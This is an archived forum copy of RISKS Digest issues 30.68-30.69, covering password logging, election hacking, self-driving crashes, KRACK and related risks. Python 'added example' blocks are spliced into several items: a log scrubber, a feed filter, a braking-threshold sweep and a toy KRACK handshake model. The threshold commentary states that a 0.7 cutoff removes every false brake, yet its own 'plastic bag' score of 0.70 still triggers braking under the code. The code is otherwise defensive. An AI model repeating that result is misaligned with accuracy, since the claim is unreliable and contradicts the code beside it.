    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Keeping your *Twitter* account secure

    Or not.

    http://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html

    When you set a password for your Twitter account, we use technology that
    masks it so no one at the company can see it. We recently identified a bug
    that stored passwords unmasked in an internal log. We have fixed the bug,
    and our investigation shows no indication of breach or misuse by anyone.

    ------------------------------
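
    Both this Twitter item and the GitHub item earlier in this issue come down to the same defect: a password that the system normally hashes was written verbatim into an internal log. As an added example (not GitHub's or Twitter's code), the filter below scrubs structured log arguments by key and free-text lines by pattern before a handler writes them. It is a last line of defence behind not logging request bodies at all; the key names, patterns and sample log calls are constructed assumptions.

```python
"""Keeping credentials out of application logs. Added example; the key
names, regexes and sample log lines are constructed, not from either
incident."""
import io
import logging
import re

MASK = "[REDACTED]"
SENSITIVE_KEYS = frozenset({
    "password", "passwd", "pwd", "secret", "token", "authorization",
    "api_key", "apikey", "cookie", "set-cookie", "private_key",
})
# Free-text forms: key=value / key: value, and HTTP Authorization credentials.
_TEXT_PATTERNS = (
    re.compile(r"(?i)\b(password|passwd|pwd|secret|token|api[_-]?key)(\s*[=:]\s*)([^\s&,;\"']+)"),
    re.compile(r"(?i)\b(Bearer|Basic)(\s+)([A-Za-z0-9._~+/=-]+)"),
)


def redact_text(text: str) -> str:
    for pattern in _TEXT_PATTERNS:
        text = pattern.sub(lambda m: m.group(1) + m.group(2) + MASK, text)
    return text


def redact(obj):
    """Recursively mask values under sensitive keys and scrub free text."""
    if isinstance(obj, dict):
        return {k: (MASK if str(k).lower() in SENSITIVE_KEYS else redact(v))
                for k, v in obj.items()}
    if isinstance(obj, (list, tuple)):
        return type(obj)(redact(v) for v in obj)
    if isinstance(obj, str):
        return redact_text(obj)
    return obj


class RedactingFilter(logging.Filter):
    """Scrub structured args by key, render the message, then scrub the text.
    Rendering before the text pass keeps '%s' placeholders intact.
    Tracebacks (exc_info) are not covered and need separate handling."""

    def filter(self, record: logging.LogRecord) -> bool:
        if record.args:
            record.args = redact(record.args)
        record.msg = redact_text(record.getMessage())
        record.args = ()
        return True


def demo() -> str:
    buf = io.StringIO()
    logger = logging.getLogger("example.auth")
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    handler.addFilter(RedactingFilter())   # on the handler: every record it emits
    logger.addHandler(handler)
    # Constructed sample log calls, the kind that leak a password verbatim.
    logger.info("login attempt user=%s password=%s", "alice", "hunter2")
    logger.info("inbound headers: %s",
                {"Authorization": "Bearer eyJabc.def.ghi", "Host": "example.com"})
    logger.info("raw form body: %s", "user=bob&password=s3cret&remember=1")
    logger.info("password reset for %s completed", "carol")  # no secret; must survive
    handler.flush()
    return buf.getvalue()


if __name__ == "__main__":
    print(demo(), end="")
```

    A scrubber only knows the field names and shapes it was told about, so it complements, rather than replaces, the rule that authentication handlers log usernames and outcomes but never the submitted credential. Pairing it with a log-search check for known test passwords gives a cheap detection for the next regression of this kind.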

    Date: Fri, 04 May 2018 14:15:59 +0000
    From: John Ohno <john...@gmail.com>
    Subject: Against Trendism: how to defang the social media disinformation
    complex (Medium)



    There's an essential mistake that almost every social media platform makes
    -- one inherited from marketing (where it makes some sense), and one that is
    mostly unexamined and unaccounted-for even in otherwise fairly
    socially-conscious projects like Mastodon and Diaspora. In almost every one
    of these systems, incentives exist that confuse popularity with value.

    I call this *trendism* -- the belief that an already-trending topic deserves
    to be promoted.

    In marketing, because the piece of information being spread is intended to
    sell a product, the spread of that information is, in fact, theoretically
    proportional to its value. In social media, the information being spread is
    not a piece of advertising, and while most of these systems have revenue
    models based on advertising, that advertising is generated on the fly based
    on the viewer's browsing history and has nothing to do with the content of
    the piece of information being spread.

    The thing is, ideas travel in packs. When we encounter one idea, we tend to
    see its nearest neighbours also. When we find out something new, our friends
    hear about it too. So, trending posts are rarely surprising: by the very
    nature of their popularity, they are already familiar in their essence to
    most of the people who are directed toward them.

    The information content of a message, in Claude Shannon's formulation, is
    proportional to its deviation from expectation -- information is surprise.
    Kolgorov's [Kolmogorov? PGN] formulation is similar: information content
    proportional to the smallest possible message that could say the same thing
    (which, of course, includes references to earlier messages or prior
    knowledge as a possible tactic).

    In other words, from an information-theoretic perspective, a post that only
    tells you things you already know is worthless. Yet, trending content is
    almost always composed solely of things the viewer has already seen.

    There's one piece of information that a copy of a viral post actually has --
    the association between the content of the post and the person posting it.
    We share posts we've already seen as a way of expressing our identity, both
    personally and within a group. That is the only form of information valued
    by trending-oriented systems: tribal affiliation.

    If we want to force our social media platforms into information-rich
    environments and lower the amount of tribal rivalry we are exposed to, there
    are a couple general-purpose solutions, and they all come down to
    kneecapping the machinery of trendism.

    1. Rather than block political content (only one kind of tribalist
    content, and one that is at least theoretically grounded in genuine
    philosophical differences about the ideal shape of the world, rather than
    geography or social groups), we should block all shared content. Remove
    retweets and shares from your feed entirely. Most of them are things you
    have already seen, and most of the rest don't contain meaningful or useful
    information.

    2. Emotionally-manipulative posts get the most engagement, and are
    therefore ranked higher in feeds. (I don't want to be emotionally
    manipulated. Do you?)* To defeat this ranking, force your feed to
    reverse-chronological order. To filter out emotionally-manipulative posts,
    filter out anything with more than a set number of interactions.

    3. Avoid being part of the problem. Before sharing, determine: is the
    information true? Is it new? Is it playing mostly on my emotions? If
    possible, delay your sharing for a long period of time -- read an article,
    and then wait a few hours, or even a few days, before deciding whether or
    not it is of sufficient quality to actually re-post.

    4. Identify when you are being drawn into heated arguments, and ignore
    them. In the heat of the moment, you're not actually making good points
    anyhow, and you're more likely to misunderstand or misrepresent your
    opponent. The suggestions from #3 apply here too for comments -- make sure
    your comments are accurate, informative, and cool, even if that means
    waiting several days to respond. Never let the system rush you.

    5. Visible metrics gamify trendism. Remove them.

    Most social media platforms don't make it easy to follow this advice.
    Mastodon is closest -- it hides metrics from the timeline by default,
    supports only reverse-chronological post ordering, and allows you to filter
    all boosts from your timeline. For everything else, you will need to use
    browser extensions.

    Facebook Demetricator ... and Twitter Demetricator [...]
    [Truncated for RISKS. PGN]
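    The five rules above are mechanical enough to encode. Here is an added
    example, not code from the Medium piece or from any platform, of a
    client-side feed filter that applies them to a constructed sample feed:
    drop shares, cap interactions, order newest-first, hide the counts, and
    gate one's own re-posts behind a delay and a three-question checklist. The
    Post fields, the sample posts and the 100-interaction cap are assumptions
    made for the example.

```python
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Post:
    post_id: str
    author: str
    text: str
    timestamp: int      # seconds since the epoch
    is_share: bool      # retweet / boost / share of someone else's post
    interactions: int   # likes + shares + replies as the platform counts them


# Constructed sample feed; authors and texts are invented for the example.
SAMPLE_FEED = [
    Post("p1", "alice", "Notes on a parser bug I found", 1525500000, False, 3),
    Post("p2", "bob", "RT @someone: OUTRAGEOUS, everyone must see this", 1525500100, True, 12000),
    Post("p3", "carol", "Hot take that is already on everyone's timeline", 1525500200, False, 50000),
    Post("p4", "dave", "Quiet write-up of a failed deployment", 1525500300, False, 0),
    Post("p5", "erin", "Boosted: same hot take again", 1525500400, True, 5),
]


def filter_feed(posts: Iterable[Post], max_interactions: int = 100) -> List[Post]:
    """Rules 1 and 2: drop every share, drop anything above the interaction
    cap (the post's proxy for emotionally manipulative, already-familiar
    content), and order what is left strictly newest-first, never by
    engagement."""
    kept = [p for p in posts
            if not p.is_share and p.interactions <= max_interactions]
    return sorted(kept, key=lambda p: p.timestamp, reverse=True)


def render(posts: Iterable[Post]) -> List[str]:
    """Rule 5: author and text only; no visible metrics to gamify."""
    return [f"{p.author}: {p.text}" for p in posts]


def share_gate(first_seen: int, now: int, is_true: bool, is_new: bool,
               mostly_emotional: bool,
               min_delay: int = 3 * 3600) -> Tuple[bool, str]:
    """Rules 3 and 4: a self-imposed check before re-posting or replying.
    Returns (allowed, reason); any failed check blocks the share, and the
    delay (assumed three hours here) is enforced even when the checks pass."""
    if not is_true:
        return False, "not verified as true"
    if not is_new:
        return False, "contains nothing the audience does not already know"
    if mostly_emotional:
        return False, "plays mostly on emotion"
    waited = now - first_seen
    if waited < min_delay:
        return False, f"wait {min_delay - waited} more seconds"
    return True, "ok"


if __name__ == "__main__":
    for line in render(filter_feed(SAMPLE_FEED)):
        print(line)
    print(share_gate(1525500000, 1525500000 + 600, True, True, False))
```

    On the sample feed only the two low-interaction original posts survive,
    newest first; the viral share and the 50,000-interaction post are gone
    before ranking ever sees them.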

    ------------------------------

    Date: Sat, 5 May 2018 10:58:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Letter to *Consumer Reports* responding to June article about
    connected cars.

    Your otherwise-excellent article on data-hoovering connected cars doesn't
    mention the downside of manufacturers being able to update automobile
    software: risking bad updates and (worse) hackers abusing update
    mechanisms. Anyone who's endured PC/phone/tablet problems with vendor
    patches -- even had devices "bricked" (made useless) -- should be terrified
    of car updates made without owner permission. And everyone aware of today's
    hacking environment should refuse to purchase anything without understanding
    and consenting to its update mechanism.

    ------------------------------

    Date: Tue, 10 Jan 2017 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.68
    ************************
     
  2. LakeGator

    Risks Digest 30.69

    RISKS List Owner

    May 16, 2018 8:35 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Wednesday 16 May 2018 Volume 30 : Issue 69

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    America continues to ignore the risks of election hacking
    (The New Yorker)
    Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)
    Virginia election officials assigned 26 voters to the wrong district
    (WashPo)
    Securing Elections (Bruce Schneier)
    Australian Emergency Calls Fail due to lightning strike (ABC AU)
    Self-driving cars' shortcomings revealed in DMV reports (Merc)
    VW bugs: "Unpatchable" remote code pwnage (TechBeacon)
    Software bug led to death in Uber's self-driving crash (Ars Technica)
    Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)
    Is technology bringing history to life or distorting it? (WashPo)
    2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)
    KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)
    Nigerian Email Scammers Are More Effective Than Ever (WiReD)
    Dark code (DW)
    Postmortem of Fortnite Service Outage (Epic Games)
    Collateral damage (538)
    Dozens of security cameras hacked in Japan (Mainichi)
    Technology turns our cities into spies for ICE, whether we like it or not
    (LATimes)
    The Digital Vigilantes Who Hack Back (The New Yorker)
    Bring in the Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate
    Staff (EFF)
    Email Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    Once Again, Activists Must Beg the Government to Preserve the
    Right to Repair (Motherboard)
    Widespread Misunderstanding of x86-64 Privileged Instruction
    Leads to Widespread Escalation Hazard (MITRE CVE 2018-8897)
    Alexa and Siri Can Hear This Hidden Command Audio Attacks (NYTimes)
    Buckle Up, Prime Members: Amazon Launches In-Car Delivery (Business Wire)
    Meant to Monitor Inmates' Calls Could Track You Too (NYTimes)
    Cell Phone Location data reportedly available to law enforcement
    without verification/process (Ars Technica)
    During disasters, active Twitter users likely to spread falsehoods:
    Study examines Boston Marathon bombing, Hurricane Sandy; also
    finds most users fail to correct misinformation (Science Daily)
    Face recognition police tools 'staggeringly inaccurate' (BBC.com)
    Intel Documentation Blamed for Multiple Operating System Security Flaws
    (IT Pro)
    The Problem with Chinese GPS (Now I Know)
    U.S. identifies suspect in major leak of CIA hacking tools (WashPo)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 7 May 2018 22:11:57 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: America continues to ignore the risks of election hacking
    (The New Yorker)

    America Continues to Ignore the Risks of Election Hacking | The New Yorker

    "America's voting systems are hackable in all kinds of ways. As a case
    in point, in 2016, the Election Assistance Commission, the bipartisan
    federal agency that certifies the integrity of voting machines, and
    that will now be tasked with administering Congress's three hundred
    and eighty million dollars, was itself hacked. The stolen data --
    log-in credentials of EAC staff members -- were discovered, by chance,
    by employees of the cybersecurity firm Recorded Future, whose
    computers one night happened upon an informal auction of the stolen
    passwords. ``This guy -- we randomly called him Rasputin -- was in a
    high-profile forum in the darkest of the darkest of the darkest corner
    of the dark Web, where hackers and reverse engineers, ninety-nine per
    cent of them Russian, hang out,'' Christopher Ahlberg, the CEO of
    Recorded Future, told me. ``There was someone from another country in
    the forum who implied he had a government background, and he wanted to
    get his hands on this stuff. That's when we decided we would just buy
    it. So we did, and took it to the government'' -- the U.S. government
    -- ``and the sale ended up being thwarted.'' (Ahlberg wouldn't
    identify which government agency his company had turned the data over
    to. The EAC, in a statement, referred questions about ``the
    investigation or information shared with the government by Recorded
    Future'' to the FBI. The FBI, through a Justice Department
    spokesperson, declined to comment.)"

    ------------------------------

    Date: Tue, 8 May 2018 22:00:18 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Russia Tried to Undermine Confidence in Voting Systems, Senators Say
    (NYTimes)

    Russia Tried to Undermine Confidence in Voting Systems, Senators Say

    ------------------------------

    Date: Mon, 14 May 2018 00:55:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Virginia election officials assigned 26 voters to the wrong district
    (WashPo)

    More than two dozen voters cast ballots in the wrong race. They were among
    6,000 misassigned voters across the state. It might've cost Democrats a
    pivotal race.

    Va. election officials assigned 26 voters to the wrong district. It might’ve cost Democrats a pivotal race.

    ------------------------------

    Date: Tue, 15 May 2018 00:07:08 -0500
    From: Bruce Schneier <schn...@schneier.com>
    Subject: Securing Elections

    (PGN-excerpted from Bruce's CRYPTO-GRAM, 15 May 2018)

    Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them.

    [This is a long item, perhaps intended for non-RISKS readers.
    Nevertheless, it is highly relevant and timely. The full article is at
    Schneier on Security: Crypto-Gram
    PGN]

    ------------------------------

    Date: Sun, 6 May 2018 01:54:31 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Australian Emergency Calls Fail due to lightning strike (ABC AU)

    Calls to 000 (the Australian emergency phone number) failed across large areas of Australia on May 04 2018.

    Government to investigate Telstra triple-0 outage after emergency calls go unanswered

    Government to conduct investigation into Telstra triple-0 outage

    ------------------------------

    Date: Thu, 3 May 2018 15:51:21 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Self-driving cars' shortcomings revealed in DMV reports (Merc)

    NNSquad
    http://www.mercurynews.com/2018/05/01/self-driving-cars-shortcomings-revealed-in-dmv-reports/

    The disengagement reports themselves identify other problems some
    self-driving vehicles struggle with, for example heavy pedestrian traffic
    or poorly marked lanes. In describing the events that caused their backup
    drivers to take the controls, the companies have provided a new window
    into the road-worthiness -- or not -- of their cars and systems. Baidu, a
    Chinese Internet-search giant, reported a case in which a driver had to take
    over because of a faulty steering maneuver by the robot car; several cases
    of "misclassified" traffic lights; a failure to yield for cross traffic;
    delayed braking behind a car that cut quickly in front; drifting out of a
    lane; and delayed perception of a pedestrian walking into the street.

    ------------------------------

    Date: Sat, 12 May 2018 02:29:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: VW bugs: "Unpatchable" remote code pwnage (TechBeacon)

    Two security researchers have excoriated Volkswagen Group for selling
    insecure cars. As in: hackable-over-the-Internet insecure.

    They broke into a recent-model VW and an Audi, via the cars' Internet
    connections, and were able to jump from system to system, running arbitrary
    code. Worryingly, they fully pwned the unauthenticated control bus connected
    to some safety-critical systems -- such as the cruise control.

    But VW has no way to push updates to its cars, and won't alert owners to
    visit a dealer for an update.

    http://techbeacon.com/vw-bugs-unpatchable-remote-code-pwnage

    ------------------------------

    Date: Mon, 7 May 2018 15:27:41 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Software bug led to death in Uber's self-driving crash (Ars Technica)

    NNSquad
    http://arstechnica.com/tech-policy/...bug-led-to-death-in-ubers-self-driving-crash/

    The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona,
    in March occurred because of a software bug in Uber's self-driving car
    technology, The Information's Amir Efrati reported on Monday. According to
    two anonymous sources who talked to Efrati, Uber's sensors did, in fact,
    detect Herzberg as she crossed the street with her bicycle.
    Unfortunately, the software classified her as a "false positive" and
    decided it didn't need to stop for her. Distinguishing between real
    objects and illusory ones is one of the most basic challenges of
    developing self-driving car software. Software needs to detect objects
    like cars, pedestrians, and large rocks in its path and stop or swerve to
    avoid them. However, there may be other objects -- like a plastic bag in
    the road or a trash can on the sidewalk -- that a car can safely ignore.
    Sensor anomalies may also cause software to detect apparent objects where
    no objects actually exist.

    [Also noted by Wendy Grossman: Classic case of where you set the
    positive/negative error rate tradeoffs in the classifier, but with the
    consequences amped up because it's a car on public roads, not a bit of
    software deciding between cats and giraffes: if you set the threshold
    too low the car stops (and jolts its passengers) for every plastic bag
    and shadow. If you set it too high...you get deaths. I wouldn't really
    call that a bug; I'd call it an experimental error. So besides the
    risks inherent in deciding where you set the threshold, there's the
    risk of allowing companies like Uber to run their experiments on public
    roads.]
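    The threshold trade-off in Wendy Grossman's note can be made concrete. The
    following is an added example, not Uber's software or data: constructed
    classifier scores for a handful of real obstacles and harmless objects, a
    function that reports the false-brake and missed-obstacle rates at a given
    threshold, and a chooser that fixes the safety bound first and only then
    minimises nuisance braking. The scores and the object labels are invented
    for the example.

```python
from typing import List, Tuple

# Constructed detections: (classifier score that this is a real obstacle,
# whether it really is one).  Scores and labels are invented for the example.
DETECTIONS = [
    (0.95, True),    # pedestrian pushing a bicycle
    (0.80, True),    # edge of a parked car
    (0.60, True),    # pedestrian in poor light
    (0.40, True),    # partially occluded pedestrian
    (0.70, False),   # plastic bag blowing across the lane
    (0.55, False),   # shadow on the road
    (0.30, False),   # trash can on the sidewalk
    (0.20, False),   # sensor noise
    (0.10, False),   # lens flare
]


def rates_at(threshold: float, detections=DETECTIONS) -> Tuple[float, float]:
    """Brake for every detection scoring >= threshold.  Return
    (false_brake_rate, missed_obstacle_rate): the first is the comfort cost
    (jolting passengers for bags and shadows), the second the safety cost."""
    real = [s for s, is_real in detections if is_real]
    fake = [s for s, is_real in detections if not is_real]
    missed = sum(1 for s in real if s < threshold) / len(real)
    false_brake = sum(1 for s in fake if s >= threshold) / len(fake)
    return false_brake, missed


def sweep(thresholds=(0.1, 0.3, 0.5, 0.7, 0.9),
          detections=DETECTIONS) -> List[Tuple[float, float, float]]:
    """Rows of (threshold, false_brake_rate, missed_rate) for a table."""
    return [(t, *rates_at(t, detections)) for t in thresholds]


def choose_threshold(max_missed: float, detections=DETECTIONS) -> float:
    """Highest threshold (fewest false brakes) whose miss rate stays at or
    below max_missed.  The safety bound is the constraint, comfort is what
    gets optimised; setting max_missed by taste is the "experimental error"
    the note describes."""
    best = 0.0
    for i in range(0, 101):            # integer steps avoid float drift
        t = i / 100
        _, missed = rates_at(t, detections)
        if missed <= max_missed:
            best = t
    return best


if __name__ == "__main__":
    for t, fb, m in sweep():
        print(f"threshold {t:.1f}: false brakes {fb:.0%}, missed obstacles {m:.0%}")
    print("threshold with zero misses:", choose_threshold(0.0))
```

    With these numbers, the threshold that misses nothing is 0.4, which also
    brakes for the bag and the shadow; raising it to 0.7 removes every false
    brake and drops two of the four real obstacles.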

    ------------------------------

    Date: Sun, 13 May 2018 13:35:53 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)

    The New York Times
    http://mobile.nytimes.com/2018/05/1...less-cars-and-their-carbon-monoxide-toll.html

    "It seems like a common convenience in a digital age: a car that can be
    powered on and off with the push of a button, rather than the mechanical
    turning of a key. But it is a convenience that can have a deadly effect.

    "On a summer morning last year, Fred Schaub drove his Toyota RAV4 into the
    garage attached to his Florida home and went into the house with the
    wireless key fob, evidently believing the car was shut off. Twenty-nine
    hours later, he was found dead, overcome with carbon monoxide that flooded
    his home while he slept. '``After 75 years of driving, my father thought
    that when he took the key with him when he left the car, the car would be
    off,'' said Mr. Schaub's son Doug.'

    Adoption of technological convenience carries transition risk. The article
    discusses a wrongful death lawsuit boosted by internal Toyota memos that
    discovered recommendations to integrate audible and visual warnings when
    the engine remains active with no key fob inside the vehicle. This
    recommendation was 86'd from implementation. Over 20 people have perished
    from vehicle-generated CO poisoning since 2006.

    ------------------------------

    Date: Sun, 13 May 2018 16:34:51 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: The risk from robot weapons (via The Statesman/Asia News Network,
    published in The Straits Times)

    http://www.straitstimes.com/asia/south-asia/the-risk-from-robot-weapons-the-statesman-contributor

    'A letter warning against the coming race of these weapons was signed in
    2015 by over 1,000 AI experts.'

    'Peter Singer, an expert on future warfare at "New America", a think tank,
    has said that very powerful forces propel the AI arms race - geopolitical
    compulsions, scientific advances and profit-seeking high technology
    companies.'

    'Scharre has also raised the possibility that perhaps because of badly
    written codes or perhaps because of cyber attack by an adversary, military
    use autonomous systems can malfunction, raising possibilities of attack on
    people or soldiers on the same side, or escalating conflicts or killing to
    unintended, highly exaggerated levels.'

    Numerous public proclamations admonishing on AV weapon risks are
    insufficient to deter investment and capability pursuit. There's apparently
    too much momentum among businesses and governments to deflect this
    juggernaut.

    With the Manhattan Project, scientific leadership recognized the risks
    nuclear weapons raised. Some scientists argued for a demonstration, rather
    than deployment, to compel quick Japanese surrender. Nagasaki and Hiroshima
    were destroyed to temporarily establish and project US nuclear hegemony as a
    deterrent.

    Aggressive international diplomacy among progressive governments might
    negotiate a non-proliferation of autonomous weaponry treaty (NPAWT), like
    the Treaty on the Non-Proliferation of Nuclear Weapons (NPT). However,
    an enforceable and verifiable treaty is unlikely to timely emerge given
    historical human proclivity and myopia, despite empirical evidence that
    argues for deliberate restraint and negotiation.

    [A timely reminder on the importance of negotiation to cut the risk of
    war can be found here
    (http://www.nytimes.com/2018/05/11/opinion/nuclear-doomsday-denial.html).]

    ------------------------------

    Date: Sun, 13 May 2018 17:22:56 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    *The Washington Post*

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    "Whatever its shortcomings, the Kennedy speech is just the latest way that
    history is being digitally re-created, updated and manipulated as never
    before. From meticulously colorized photographs to immersive
    virtual-reality battlefields, scholars, artists and entrepreneurs are
    dragging the old days into the computer age. And scholastic standards are
    straining to keep up.

    "The U.S. Military Academy is working on a phone-based app along the lines
    of Pokemon Go that will let visitors see how George Washington's troops
    strung a massive iron chain across the Hudson River. A team in North
    Carolina has synthesized an important but unrecorded 1960 speech by Martin
    Luther King Jr., acoustically accurate down to the echoes in the Durham
    church."

    Simulation capability has improved to the point where a political leader can
    be used to construct a fictitious speech which appears authentic, with the
    power to convince an enraptured audience. This capability, if exploited by
    mendacious political entities, can accelerate democracy's decline.

    Publication of false and misleading political speech, especially by elected
    authorities, empowers authoritarianism. Current political discourse in the
    US is heavy with misleading facts and falsehoods that confuse public
    sentiment. This manipulation distracts attention from government's intent to
    apparently conceal a hidden political agenda. Exactly what the agenda is,
    beyond "pay for play," is difficult to divine.

    The introduction of bots applied for this purpose introduces an asymmetric
    multiplier for dissembled political discourse. By the time a policy becomes
    apparent through executive enforcement, the bots will have buried the policy
    agenda into a messaging morass that will potentially overwhelm any
    independent observer's (the free press) ability to analyze. The result is
    likely to suppress litigation that thwarts ill-conceived public policy that
    exclusively benefits "payers."

    ------------------------------

    Date: Sat, 5 May 2018 11:51:07 +0200
    From: Alberto Cammozzo <ac+...@zeromx.net>
    Subject: 2,000 wrongly matched with possible criminals at Champions League
    (BBC AU)

    (via Diego Latella)

    More than 2,000 people were wrongly identified as possible criminals by
    facial scanning technology at the 2017 Champions League final in Cardiff.
    South Wales Police used the technology as about 170,000 people were in
    Cardiff for the Real Madrid v Juventus game. But of the 2,470 potential
    matches with custody pictures, 92% (2,297) were wrong.

    Chief Constable Matt Jukes said officers "did not take action" and no one
    was wrongly arrested.

    South Wales Police have made 450 arrests in the last nine months using the
    automatic facial recognition (AFR) software, which scans faces comparing
    them to about 500,000 custody images.

    http://www.bbc.co.uk/news/technolog...d5b45569c1|40779d3379c44626b8bf140c4d5e9075|1

    ------------------------------

    Date: Sun, 6 May 2018 15:15:31 +0100
    From: Wols Lists <antl...@youngman.org.uk>
    Subject: KRACK Wi-Fi vulnerability can expose medical devices, patient
    records (Osborne, R 30 68)

    Actually, I believe it exploits a flaw in the most common IMPLEMENTATION
    of the protocol.

    For security reasons, once the key has been checked the first time, the
    recipient forgets it (over-writes it with 0s), so if the attacker can
    interrupt the handshake at that point, they can resend a key of all zeros
    and authenticate.

    The receiver should either abort the handshake completely, or not
    forget the key until the handshake is complete.
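    The two fixes proposed above can be checked against a toy model of the
    behaviour the post describes. This is an added example, not wpa_supplicant
    or any vendor's code: a supplicant that zeroes its key buffer after the
    first install but still re-runs the install on a repeated message 3, beside
    one that marks the handshake complete after the first install and treats
    any later message 3 as a retransmission to be acknowledged without
    re-installing. The key length, the in-memory layout and the reduced
    handshake (only message 3 is modelled) are assumptions of the simulation.

```python
KEY_LEN = 16
ZERO_KEY = bytes(KEY_LEN)


class VulnerableSupplicant:
    """Behaviour described in the post: the key is overwritten with zeros
    once it has been installed, yet a retransmitted message 3 runs the
    install path again, so the zeroed buffer becomes the key in use."""

    def __init__(self, ptk: bytes):
        self.ptk = ptk              # key material agreed earlier (constructed)
        self.installed_key = None   # what the data path encrypts with
        self.install_count = 0

    def on_message3(self) -> bytes:
        self.installed_key = self.ptk   # install whatever the buffer holds
        self.install_count += 1
        self.ptk = ZERO_KEY             # "forget" the key for security
        return self.installed_key


class FixedSupplicant:
    """Both remedies from the post at once: the key is kept until the
    handshake is complete, and once complete the install path is never
    re-entered, so clearing the buffer afterwards is harmless."""

    def __init__(self, ptk: bytes):
        self.ptk = ptk
        self.installed_key = None
        self.install_count = 0
        self.handshake_complete = False

    def on_message3(self) -> bytes:
        if self.handshake_complete:
            # Retransmission: keep using the key already installed.
            return self.installed_key
        self.installed_key = self.ptk
        self.install_count += 1
        self.handshake_complete = True
        self.ptk = ZERO_KEY             # safe now: no further install possible
        return self.installed_key


def run_handshake(supplicant, message3_deliveries: int) -> bytes:
    """Deliver message 3 the given number of times (1 = normal, more = the
    interrupted-and-resent case) and return the key left in use."""
    for _ in range(message3_deliveries):
        supplicant.on_message3()
    return supplicant.installed_key


def key_in_use_is_zero(supplicant, message3_deliveries: int) -> bool:
    """Detection-style check: did the client end up encrypting with zeros?"""
    return run_handshake(supplicant, message3_deliveries) == ZERO_KEY


if __name__ == "__main__":
    demo_key = bytes(range(KEY_LEN))    # constructed key material
    print("vulnerable, one delivery :", key_in_use_is_zero(VulnerableSupplicant(demo_key), 1))
    print("vulnerable, two deliveries:", key_in_use_is_zero(VulnerableSupplicant(demo_key), 2))
    print("fixed, two deliveries     :", key_in_use_is_zero(FixedSupplicant(demo_key), 2))
```

    The model makes the post's point explicit: the defect is not the
    zeroing itself but re-entering the install path after the buffer has been
    cleared. Either remedy removes that path, and the fixed supplicant installs
    exactly once however many copies of message 3 arrive.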

    ------------------------------

    Date: Sun, 6 May 2018 22:54:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Nigerian Email Scammers Are More Effective Than Ever (WiReD)

    You would think that after decades of analyzing and fighting email spam,
